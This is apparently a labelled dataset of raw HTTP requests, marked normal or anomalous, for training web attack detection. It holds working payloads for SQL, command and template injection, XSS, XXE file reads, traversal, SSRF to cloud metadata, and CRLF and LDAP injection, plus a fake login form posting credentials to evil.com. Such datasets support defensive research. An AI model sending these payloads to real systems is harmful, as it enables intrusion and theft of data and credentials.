raw-request stringlengths 20 82.8k | label stringclasses 2
values | attack_type stringclasses 17
values |
|---|---|---|
GET /rest/products/search?q=%20%0aYUI=%24%28echo%20JGJRTX%29%0aYUI1=%24%7B%23YUI%7D%0aif%20%5B%201%20-eq%20%24YUI1%20%5D%0athen%20sleep%201%0afi%27 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close | anomalous | Command_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: de0c9f71-aeff-48b1-9918-38b865128824 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=72FF8E6297DDBAD87698AE2153C6AA3D
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 116
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id><svg onload=prompt%281%29></id>
<name>admin</name>
</user> | anomalous | Cross_Site_Scripting |
GET /manager/html HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Authorization: Basic UUNDOmoyZGVwbG95ZXI=
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
GET /rest/products/search?q=%2D%32%33%37%36%27%29%29%29%2F%2A%21%4F%72%2A%2F%34%33%37%33%3D%63%41%73%54%28%28%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%30%37%29%7C%7C%63%68%52%28%31%31%33%29%29%7C%7C%28%2F%2A%21%53%65%4C%45%43%54%2A%2F%28%2F%2A%21%43%61%53%45%2A%2F%2F%2A%21%77%48%45%4E%2A%2F%28%34%33%37%33%3D%34%33%37%33%29%2F%2A%21%74%68%65%4E%2A%2F%42%69%54%63%4F%55%6E%74%28%42%49%54%73%74%52%49%6E%67%5F%74%6F%5F%42%49%4E%41%72%59%28%28%63%68%52%28%34%39%29%29%29%29%2F%2A%21%45%6C%73%65%2A%2F%42%69%54%63%4F%55%6E%74%28%42%49%54%73%74%52%49%6E%67%5F%74%6F%5F%42%49%4E%41%72%59%28%28%63%68%52%28%34%38%29%29%29%29%2F%2A%21%45%6E%64%2A%2F%29%29%3A%3A%2F%2A%21%56%61%72%63%68%41%72%2A%2F%7C%7C%28%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%31%32%32%29%7C%7C%63%68%52%28%31%31%33%29%29%2F%2A%21%41%73%2A%2F%2F%2A%21%6E%55%6D%45%72%49%43%2A%2F%29%2F%2A%21%41%4E%64%2A%2F%28%28%28%27%64%53%79%50%27%2F%2A%21%6C%69%4B%45%2A%2F%27%64%53%79%50 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=cookie-httponly HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=0173178248438E974E75B3EE27AE15DB
Host: localhost
Connection: close | anomalous | Web_Cache_Deception |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=9840A18582F49052A3EDE350EC1FBDFC
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 408
id=%7B%7BString.fromCharCode%28101%2C118%2C97%2C108%2C40%2C96%2C36%2C123%2C115%2C101%2C108%2C102%2C46%2C116%2C101%2C109%2C112%2C108%2C97%2C116%2C101%2C46%2C109%2C111%2C100%2C117%2C108%2C101%2C46%2C99%2C97%2C99%2C104%2C101%2C46%2C117%2C116%2C105%2C108%2C46%2C111%2C115%2C46%2C115%2C121%2C115%2C116%2C101%2C109%2C40%2C39%2C105%2C100%2C39%2C41%2C125%2C124%2C115%2C97%2C102%2C101%2C96%2C41%29%7D%7D&submit=Submit | anomalous | Server_Side_Template_Injection |
GET /?ref=a79af3d1-2143-4415-9d79-3c23e9e84cba&session_token=4823 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a79af3d1-2143-4415-9d79-3c23e9e84cba | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=7A7EB378515544092DD8ED8EBD51B111
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 543
id=%3Cimg%20src%3D%22/withdraw%3F%3Cinput%20type%3D%22text%22%20name%3D%22email%22%20value%3D%22hacker%40evil.com%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22destination%22%20value%3D%22promote%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22user_id%22%20value%3D%22admin%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22recipient%22%20value%3D%22delete%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22amount%22%20value%3D%22delete%2520%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22recipient71%22%20value%3D%22password123%22%3E%22%3E&submit=Submit | anomalous | Cross_Site_Request_Forgery |
GET /vulnerabilities/sqli/?id={$smarty.version}}}// HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=F7795E9DAADFC3ACDA656F53BE9E2E6D
Host: localhost
Connection: close | anomalous | Server_Side_Template_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=06E86069824416E49D5DCC3835EAF1AD
Referer: http://malicious.com/%3Fpage%3D%0A%0D%252525250d%252525250a0%0D%0A%0D%0AHacked%21
Host: localhost
Connection: close | anomalous | CRLF_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a693633f-4d36-4e47-a87f-012657742ecd | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=6BB44A83F19C1B1242D5CAF0508B37EF
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 154
{"id": "<?xml version=\"1.1\"?><!DOCTYPE foo [<!ENTITY leak SYSTEM \"file://C:/Windows/system32/config/sam%20\"> ]><xml>&leak;</xml>", "action": "search"} | anomalous | XML_External_Entity |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=FF045DAC4812CD199C4408B53ECE1F77
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 171
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>%fc%80%80%80%80%ae%fc%80%80%80%80%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts</id>
<name>admin</name>
</user> | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=2261BD12FFCEAF5448185B59D728D003
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 108
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>x-forwarded-scheme</id>
<name>admin</name>
</user> | anomalous | Web_Cache_Deception |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=D1DBD7E906E83E2DD4D87BEAE381061E
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 59
id=%25252e%25252e%25255cboot.ini%3Bindex.html&submit=Submit | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=037E9B33BEC2B04090715864B9F8AC16
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 113
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>user%252A*))|(%252A\x00</id>
<name>admin</name>
</user> | anomalous | LDAP_Injection |
GET /error/error.log HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 8fb2abd3-055c-4067-9b65-6ad4a8d0f7aa | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: f9f13f59-f2d0-42a7-95da-c637b4d86bf3 | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: dac034ee-5937-4b02-8541-d33dd447c880 | normal | none |
GET /vulnerabilities/sqli/?id=<p>Website Defaced! HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=8A851A9F65130BDEE77CA3E4A93B15C1
Host: localhost
Connection: close | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=8612E15C4DA43E45E07AA50DB2880838
Referer: http://malicious.com/%2b%0a%20Set-Cookie:crlf=injection; Path=/
Host: localhost
Connection: close | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=dict://?0177.0.0.1:27017 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=95917E22BE4081E52C1ECA639F39077C
Host: localhost
Connection: close | anomalous | Server_Side_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=8B6AD38DD123133E3499EF46418406EF
Referer: http://malicious.com/../%25250d%25250a%u000dTransfer-Encoding: chunked
Host: localhost
Connection: close | anomalous | CRLF_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4990b49c-9e06-4525-aa4c-6a6797e1d8ee | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a662d5d1-7aa1-4217-b40f-b16ee1cf1e1e | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=EF807C253B096B3E2D04928D973E3660
Referer: http://malicious.com/%3Furl%3D%2525%2530%2564%2525%2530%2561Content-Type%3A%20text/html%2525%2530%2564%2525%2530%2561HTTP/1.1%20200%20OK
Host: localhost
Connection: close | anomalous | CRLF_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=C67310631FD9889CF18637D9A061E4D7
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 207
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c</id>
<name>admin</name>
</user> | anomalous | Local_File_Inclusion |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=7922014457625306D7FFF8A385E17919
Referer: http://malicious.com/)(objectClass=*)*|
Host: localhost
Connection: close | anomalous | LDAP_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=F63971ECB182DE4C797C022EF527BCB8
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 223
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}</id>
<name>admin</name>
</user> | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=6AD95C81E416FA90F128E8453E646E36
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 409
{"id": "<form action=\"https://evil.com/steal\" style=\"position:fixed;top:15%;left:52%;background:white;padding:30px;border:4px solid red;z-index:999999;box-shadow:0 0 20px red;\"><h2>Session Expired</h2>Username: <input name=\"uQlB7\"><br><br>Password: <input type=\"password\" name=\"plfu2\"><br><br><button style=\"background:red;color:white;padding:10px;\">Login Now</button></form>", "action": "search"} | anomalous | HTML_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=7FB0162BBF7502111D41267192D3B629
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 96
id=%7B%7BString.fromCharCode%28123%2C123%2C52%2C42%2C52%2C125%2C125%29%7D%7D%7D%7D&submit=Submit | anomalous | Server_Side_Template_Injection |
GET /login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/16.2 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced_Vulnerability_Scan |
GET /rest/products/search?q=%3Ch1%20style%3D%22color%3Ared%3Bfont-size%3A30px%3Bfont-weight%3Abold%3B%22%3EInjected%3C/h1%3E HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=12884964261DDF86A1980361DD09D442
Host: localhost:3000
Connection: close | anomalous | HTML_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: c10e6eba-8ad1-46f6-b471-59703d212c0a | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=FB988E6FC5440D9DCBDE70B77FD7A15F
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 271
id=%3Ci%20style%3D%22position%3Afixed%3Btop%3A50%25%3Bleft%3A50%25%3Btransform%3Atranslate%28-50%25%2C-50%25%29%3Bfont-size%3A70px%3Bcolor%3Alime%3Bbackground%3Ablack%3Bpadding%3A20px%3Bz-index%3A999999%3Btext-align%3Acenter%3B%22%3ECOMPROMISED%3C/center%3E&submit=Submit | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=480CE2636E423AA384373250F4C04594
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /rest/products/search?q=fruit&cache_id=1f0e1584-523f-485d-a04f-0c20e7278806 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 1f0e1584-523f-485d-a04f-0c20e7278806 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=64B6D541B8DA9B7CA41EB97BAD6C510A
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 133
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>ldap://http://metadata.google.internal:5432</id>
<name>admin</name>
</user> | anomalous | Server_Side_Request_Forgery |
GET /rest/products/search?q=shirt&cache_id=253fb785-bf38-42e7-a8e1-821174cda2d5 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 253fb785-bf38-42e7-a8e1-821174cda2d5 | normal | none |
POST /FormLogin HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100 | anomalous | Advanced_Vulnerability_Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <form action="/change-role%09" method="DELETE"><input type="hidden" name="csrf_token" value="admin%40evil.com"><input type="hidden" name="confirm_password" value="hacked"><input type="hidden" name="admin" value="delete`"><input type="hidden" name="password" value="hacker%40evil.com"><input type="hidden" name="amount" value="password123"><button>Submit</button></form>
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=83B31CAA026ED220DA4F285ABC28A28F
Host: localhost
Connection: close | anomalous | Cross_Site_Request_Forgery |
